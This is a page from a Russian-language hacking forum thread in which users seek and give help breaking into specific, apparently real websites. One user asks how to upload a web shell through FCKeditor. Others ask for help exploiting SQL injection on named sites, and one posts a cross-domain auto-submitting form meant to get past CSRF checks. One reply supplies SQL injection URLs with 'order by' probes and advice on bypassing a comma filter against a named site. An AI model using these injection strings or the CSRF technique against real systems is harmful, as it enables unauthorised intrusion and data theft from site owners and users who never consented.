HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1041  
Старый 23.01.2016, 18:41
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от RWD  
RWD said:

Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?

https://www.google.ru/search?q=fckeditor+заливка+шелла
 
Ответить с цитированием

  #1042  
Старый 24.01.2016, 15:12
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

Привет. Помогите раскрутить SQL:

Код:
Code:
https://www.sbxchanger.com/feedback.php?p=ok&page=/
 
Ответить с цитированием

  #1043  
Старый 24.01.2016, 20:03
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от jangle  
jangle said:

Привет. Помогите раскрутить SQL:
Код:
Code:
https://www.sbxchanger.com/feedback.php?p=ok&page=/
не крутиться вроде бы
 
Ответить с цитированием

  #1044  
Старый 24.01.2016, 20:34
sergei_petrovish
Guest
Сообщений: n/a
Провел на форуме:
11346

Репутация: 1
По умолчанию

Здраствуйте, не могу отправить пост форму ajax c сообщением. Проверка на CSRF , сообщение без перезагрузки страницы

Никаких скрытых параметров не передается, может есть какая то особенность в этих форм ?

Код формы

Код HTML:
HTML:

Отправить сообщение 
Мой код формы автоматической отправки с другого домена

Код HTML:
HTML:

document.getElementsByTagName('form')[0].submit();
 
Ответить с цитированием

  #1045  
Старый 25.01.2016, 15:29
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

http://www.bbctop.cc/index.php?act=respons.respons&cid=%27

Как подключится ?

пытался havil1.6 и дампером

не катит
 
Ответить с цитированием

  #1046  
Старый 25.01.2016, 15:58
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

http://www.bbctop.cc/index.php?act=respons.respons&cid=%27
Как подключится ?
пытался havil1.6 и дампером
не катит
Фильтрация на запятые.

Код:
Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+
Используйте конструкции join
 
Ответить с цитированием

  #1047  
Старый 25.01.2016, 16:34
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

Фильтрация на запятые.
Код:
Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+
Используйте конструкции join
Чёт не фига не получается
 
Ответить с цитированием

  #1048  
Старый 25.01.2016, 17:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Чёт не фига не получается
А что вы попробовали?

Покажите запрос.
 
Ответить с цитированием

  #1049  
Старый 25.01.2016, 17:48
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

А что вы попробовали?
Покажите запрос.
Ты не понял, я не очень шарю в языке php и sql
 
Ответить с цитированием

  #1050  
Старый 25.01.2016, 21:38
ArmusIAm
Guest
Сообщений: n/a
Провел на форуме:
7147

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

Фильтрация на запятые.
Код:
Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+
Используйте конструкции join
Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.

В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):

Код:
Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--
Проблема начинается в http://www.bbctop.cc/index.php?act=r...5,6,7,8,9,10--

Можешь показать на этом примере? Спасибо!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ